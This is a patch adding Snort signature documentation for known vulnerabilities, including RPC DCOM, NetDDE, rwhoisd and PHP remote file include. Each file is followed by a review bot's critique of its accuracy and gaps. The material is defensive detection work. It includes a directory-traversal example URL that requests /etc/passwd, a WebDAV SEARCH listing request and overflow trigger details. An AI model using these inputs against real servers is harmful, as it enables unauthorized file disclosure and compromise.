+The ypupdated service is used in conjunction with NIS servers to 
+remotely update changes made in NIS databases.
+
+On recieving a request the yupdated service executes a make command 
+using the Bourne shell. It is possible to execute code using 
+metacharacters in the request.
+
+Commands and code after the metacharacters in the request will be 
+executed with the privileges of the super user on the vulnerable system.
+
+--
+Affected Systems:
+	HP-UX 10.1, 10.10 and 10.20
+	
+	IBM AIX 3.2 and 4.1
+	
+	NEC EWS-UX/V (Rel4.2MP), (Rel4.2)
+	NEC UP-UX/V (Rel4.2MP)
+	NEC UX/4800 (64)
+	
+	SGI IRIX 3.2, 3.3, 3.3.1, 3.3.2, 3.3.3
+	SGI IRIX 4.0, 4.0.1 T, 4.0.1,4.0.2, 4.0.3, 4.0.4 T, 4.0.4 B, 4.0.4, 4.0.5 IPR, 4.0.5 H, 4.0.5 G, 4.0.5 F, 4.0.5 E, 4.0.5 D, 4.0.5 A, 4.0.5 (IOP), 4.0.5
+	SGI IRIX 5.0, 5.0.1, 5.1, 5.1.1, 5.2, 5.3 XFS, 5.3
+	SGI IRIX 6.0, 6.0.1 XFS, 6.0.1
+	
+	Sun SunOS 4.1 PSR_A, 4.1, 4.1.1, 4.1.2, 4.1.3 c, 4.1.3 _U1, 4.1.3, 4.1.4 -JL, 4.1.4
+
+--
+Attack Scenarios:
+The attacker needs to craft a specially formulated request to the 
+rpc.ypupdated service containing a long username. An exploit for this 
+vulnerability exists.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply pacthes for the affected systems as soon as possible.
+
+Disable the rpc.ypupdated daemon.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1749
+
+--
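Review bot: the Summary is truncated ("vulnerability in the rcp service ypupdated.") and what survives has "rcp" where "rpc" is meant; restore the sentence. Attack Scenarios says the request contains "a long username", which describes an overflow, while Detailed Information describes command injection through shell metacharacters reaching a make invocation; these are different bugs with different rule content, so state which one SID 2088 detects. Also "recieving", "yupdated", "pacthes".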
--- /dev/null
+++ b/doc/signatures/1644.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1644
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
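Review bot: nothing in this file says which CGI program or URI SID 1644 matches; every section is generic ("a CGI web application running on a server"), so an analyst cannot judge the False Positives entry ("None known") or decide whether a host is affected. Add the script name and the request pattern the rule keys on to Summary and Detailed Information, and fill Additional References, since Ease of Attack asserts "Exploits exist".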
--- /dev/null
+++ b/doc/signatures/1323.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid: 1323
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a format string vulnerability in the rwhois daemon from Network Solutions.
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to execute arbitrary code.
+
+--
+Detailed Information:
+Certain versions of rwhoisd from Network Solutions contain a programming error that allows an attacker to execute arbitrary code. The error is present when used with the Start of Authority (soa) file directive.
+
+Referral Whois (rwhois) is a directory service used to provide information on hosts and networks connected to the internet.
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0838
+
+Bugtraq:
+http://www.securityfocus.com/bid/3474
+
+--
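Review bot: the Affected Systems section is missing entirely, so "the latest non-affected version" in Corrective Action has no anchor; name the rwhoisd versions covered by CAN-2001-0838. Attack Scenarios ("Exploit scripts are available") duplicates Ease of Attack instead of describing the scenario; say that an unauthenticated client sends a crafted request to the rwhois port and that the attacker-controlled string is interpreted as a format string in the soa directive handling described in Detailed Information. Typo: "compromize".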
--- /dev/null
+++ b/doc/signatures/2966.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2966
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
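Review bot: Detailed Information says the service "is not started by default", but Ease of Attack is "Simple." with no qualification; state that remote exploitation requires NetDDE to be running on the target. Make Corrective Action's "Disable the NetDDE service" concrete: set the service startup type to Disabled rather than merely stopping it, since the same text warns that a local attacker can use this issue to escalate after getting a foothold. Attack Scenarios should also name the transport and port the rule watches so the event can be correlated with other traffic.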
--- /dev/null
+++ b/doc/signatures/3307.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3307
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
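Review bot: third verbatim copy of the SID 3227 text; each of the three rule documents should say what its own rule detects. Beyond the duplication, Impact ("full administrator access of the machine") understates the case made in Detailed Information, which says code runs "with the privileges of the local system account"; SYSTEM outranks Administrator, and Impact should say so.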
--- /dev/null
+++ b/doc/signatures/459.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+459
+
+--
+
+Summary:
+This event is generated when an ICMP Type 1 datagram with an undefined ICMP Code is detected on the network. 
+
+--
+
+Impact:
+ICMP Type 1 datagrams are not currently used by any known devices.
+
+--
+
+Detailed Information:
+ICMP Type 1 is not defined for use and is not expected network activity.  Any ICMP datagram with an undefined ICMP Code should be investigated.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Ingress filtering should be utilized to block incoming ICMP Type 1 datagrams
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References:
+None
+
+
+--
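Review bot: Summary says the rule fires on "an ICMP Type 1 datagram with an undefined ICMP Code", while Detailed Information says Type 1 itself "is not defined for use"; if the type is unassigned every code is undefined, so state plainly whether the rule matches any ICMP type 1 message or only particular codes. Impact ("not currently used by any known devices") is not an impact; say what an analyst should infer from the traffic (a crafted packet from one of the tools mentioned under Ease of Attack, or a malfunctioning stack) so Attack Scenarios is not left at "None known". Corrective Action mentions only "incoming" Type 1 datagrams; a host emitting them outbound warrants the same look.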
--- /dev/null
+++ b/doc/signatures/2110.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+2110
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow condition in the Post Office Protocol (POP) command STAT.
+
+--
+Impact:
+Possible remote execution of arbitrary code leading to a remote root 
+compromise.
+
+--
+Detailed Information:
+A vulnerability exists such that an attacker may overflow a buffer by
+sending a line feed character to a POP server via the STAT command.
+
+--
+Attack Scenarios:
+Simple.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+RFC 1939:
+http://www.faqs.org/rfcs/rfc1939.html
+
+--
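Review bot: Detailed Information says an attacker "may overflow a buffer by sending a line feed character to a POP server via the STAT command"; a single line feed cannot overflow anything, so either the trigger is a STAT line with an overlong argument or the rule matches something else, and the text should say which. Affected Systems is missing, so "the latest non-affected version" has no referent; name the POP server implementation. Attack Scenarios ("Simple.") duplicates Ease of Attack and should describe the exchange, noting that per RFC 1939 STAT is only accepted in the TRANSACTION state, i.e. after authentication, which limits who can trigger it. RFC 1939 documents the protocol, not the bug; add the advisory.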
--- /dev/null
+++ b/doc/signatures/2051.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2051
+
+--
+Summary:
+designated root directory of a web server.
+
+--
+Impact:
+Theft of data and important system information may be disclosed to an 
+unauthorized party.
+
+--
+Detailed Information:
+The script handling file viewing from the vendor moreover.com contains an error that allows files outside the designated root directory to be viewed in a browser.
+
+The script does not perform checks for the characters ".." when supplied
+by a user in a URL. This allows a classic directory traversal attack to 
+be performaed against the server.
+
+--
+Affected Systems:
+Version 1.0 from moreover.com
+
+--
+Attack Scenarios:
+The attacker merely needs to enter a URL using ../ to traverse the file 
+system for example:
+http://www.foo.com/cgi-bin/cached_feed.cgi?../../../etc/passwd
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to version 2.0 or later
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1762
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0906
+
+--
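Review bot: the Summary begins mid-sentence ("designated root directory of a web server.") and Affected Systems ("Version 1.0 from moreover.com") never names the product; the script name cached_feed.cgi appears only in the example URL, so put it in Summary and Affected Systems. Detailed Information says the script "does not perform checks for the characters '..'"; False Negatives should then mention URL-encoded traversal sequences (%2e%2e), which defeat a naive string check and are matched by the rule only if it relies on the URI normalization done by the HTTP preprocessor. Typo: "performaed".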
--- /dev/null
+++ b/doc/signatures/1070.txt
@@ -0,0 +1,75 @@
+Rule:  
+
+Sid:
+1070
+
+--
+
+Summary:
+This event is generated when an attempt is made to initiate a WebDAV SEARCH 
+on a web server.
+
+--
+Impact:
+Information gathering. Potential Denial of Service (DoS).
+
+--
+Detailed Information:
+IIS 5.0 includes an implementation of WebDAV for purposes of web publishing.
+As shipped, it contains two vulnerabilities that can allow an attacker
+to get a complete directory listing from the web root and to DoS the
+web server.
+
+If the target is IIS 5.0, then an attacker may have gotten a complete
+directory listing from within the web root, which can be useful information
+for attackers (could be a prelude to a more serious attack).  IIS 5.0's
+WebDAV implementation is also vulnerable to a Denial of Service vulnerability
+if the search string is too long.
+
+--
+Affected Systems:
+	IIS 5.0
+	Any web server running WebDAV, though no exploits are known for servers 
+	other than IIS 5.0.
+
+--
+Attack Scenarios:
+Attacker gets a listing by sending something like:
+SEARCH / HTTP/1.1
+Attacker DoSes the web server using pre-existing tools.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Check the host for signs of compromise.
+
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+Disallow WebDAV access to the server from resources external to the
+protected network.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+--
+Additional References:
+
+--
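Review bot: False Positives ("None Known.") is wrong for this rule: SEARCH is a legitimate WebDAV/DASL method used by real clients, so any site with WebDAV enabled will see benign SEARCH requests, and the analyst needs that stated. Corrective Action opens with "Check the host for signs of compromise", which does not follow from a directory listing or a DoS; the actionable items are the vendor patch and disabling WebDAV on IIS 5.0 where it is not needed. Structurally, the "--" separator after "Rule:" is missing, unlike the other files. Additional References is empty; cite the IIS 5.0 bulletin the patch line refers to.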
--- /dev/null
+++ b/doc/signatures/100000759.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000759
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "QTO File Manager" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "edit" parameter in the "qtofm.php" script used by the "QTO File Manager" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using QTO File Manager
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
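Review bot: Impact ("system integrity compromise. Possible unauthorized administrative access to the server... execution of arbitrary code") is the remote-file-include boilerplate and overstates a cross site scripting bug, whose payload runs in the victim's browser rather than on the server; rewrite Impact around what XSS yields (session cookie or credential theft, actions performed in the victim's session, injected page content) and drop the "execute system binaries" sentence from Detailed Information. Attack Scenarios should say that the malicious link targets the "edit" parameter of qtofm.php named above.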
--- /dev/null
+++ b/doc/signatures/100000420.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000420
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Informium" application running on a webserver. Access to the file "common-menu.php" using a remote file being passed as the "CONF[local_path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "CONF[local_path]" parameter in the "common-menu.php" script used by the "Informium" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Informium
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
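Review bot: the parameter is an array element, "CONF[local_path]", which suggests the script populates its configuration from request variables (register_globals or an equivalent extract); that belongs in Detailed Information and gives Corrective Action two mitigations it currently lacks, register_globals=Off and allow_url_include=Off, which work without waiting for a new Informium release. The credential-validation paragraph in Detailed Information is unrelated boilerplate and should be removed.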
--- /dev/null
+++ b/doc/signatures/105-1.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+105-1
+
+--
+Summary:
+This event is generated when the pre-processor spp_bo detects network
+traffic that may constitute an attack. Specifically back orifice
+traffic was detected.
+
+--
+Impact:
+Unknown. This is possible Trojan activity.
+
+--
+Detailed Information:
+This event is generated when the spp_bo pre-processor detects network
+traffic that may consititute an attack.
+
+Back Orifice is a Trojan horse program for Microsoft systems. This event
+may indicate that this Trojan is active and in use on the protected
+network.
+
+--
+Affected Systems:
+	Microsoft Windows 95, 98, ME, NT, 2000
+
+--
+Attack Scenarios:
+This is Trojan activity. An attacker can use this Trojan to control the
+target host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
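Review bot: Corrective Action ("Apply any appropriate vendor supplied patches") does not fit a trojan; there is nothing to patch, so the remediation is to remove Back Orifice from the host (or rebuild it) and establish how it was installed. "105-1" is a generator:id pair for the spp_bo preprocessor rather than a rule SID, so the document should say the event comes from the preprocessor and that its sensitivity depends on the spp_bo configuration; False Positives "None Known." deserves a caveat for other traffic that happens to match the preprocessor's detection. Typo: "consititute".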
--- /dev/null
+++ b/doc/signatures/2745.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2745
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_snapshot_propagation
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
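Review bot: the last Detailed Information sentence is broken across lines so that a line consisting only of ". This procedure is included in" follows "vulnerability in the procedure alter_snapshot_propagation"; join it as "vulnerability in the procedure alter_snapshot_propagation. This procedure is included in dbms_repcat." Under Affected Systems, "Oracle Oracle9i" repeats the vendor name and reads as a typo; if the vendor/product convention is intended it should be applied consistently across the other files, otherwise "Oracle9i" alone is clearer. Several separators are "-- " with trailing whitespace where the file otherwise uses "--", and the Additional References section is empty although the Summary calls this a known vulnerability.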
--- /dev/null
+++ b/doc/signatures/100000140.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+100000140
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a buffer overflow in 
+the MySQL MaxDB web server.
+
+-- 
+
+Impact: 
+A denial of service will occur, and arbitrary code may be executed with the 
+privileges of the user running the web server.
+
+--
+Detailed Information:
+If an HTTP GET request beginning with a "%" character and followed by at least 
+215 non-newline characters is sent to the MySQL MaxDB web server, a buffer 
+overflow will occur. This will result in a denial of service, and possibly 
+execution of arbitrary code with the privileges of the user running the web 
+server.
+
+--
+Affected Systems:
+MySQL MaxDB >= 7.5.00.24
+
+--
+
+Attack Scenarios: 
+This vulnerability may be exploited with a web browser or an automated script.
+
+-- 
+
+Ease of Attack: 
+Simple, as a web browser can be used.
+
+-- 
+
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Upgrade to version 7.5.00.26 or higher.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
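Review bot: Affected Systems says "MySQL MaxDB >= 7.5.00.24" with no upper bound, but Corrective Action says "Upgrade to version 7.5.00.26 or higher.", which implies 7.5.00.26 and later are not affected; state the range as 7.5.00.24 up to but not including 7.5.00.26, or drop the open-ended ">=". The trigger condition in Detailed Information (a GET request beginning with "%" followed by at least 215 non-newline characters) is precise and useful; carry it into False Positives, since a legitimate URL-encoded request of that length would match the same pattern, rather than leaving "None Known". Layout: this file inserts a blank line after several "-- " separators and uses trailing whitespace, unlike the other signature files in the patch.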
--- /dev/null
+++ b/doc/signatures/895.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+895
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
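Review bot: nothing in the text identifies which CGI script or which known vulnerability sid 895 matches; the Summary says only "a CGI web application running on a server", so an analyst cannot tell from this documentation what the rule detects. Name the script in the Summary and cite the vulnerability under Additional References, which is currently empty. Minor: "running ona web server" should be "running on a web server", "attackers choosing" (Impact and Detailed Information) should be "attacker's choosing", and the line "relationships between the victim server and other hosts can be exploited by the attacker." is not wrapped like the rest of the file.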
--- /dev/null
+++ b/doc/signatures/3437.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3437
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
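Review bot: "Expoit code exists." under Ease of Attack should be "Exploit code exists." The Additional References section is empty for a Microsoft RPC DCOM issue; cite the vendor security bulletin, as 2959.txt in this same patch does for its NetDDE rule. In Corrective Action, the port filtering is explicitly limited to "external sources"; add a sentence that hosts inside the protected network can still reach ports 135, 139 and 445, so the filter is a mitigation and the vendor patch remains required.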
--- /dev/null
+++ b/doc/signatures/100000577.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000577
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "cat_path_update.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"cat_path_update.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
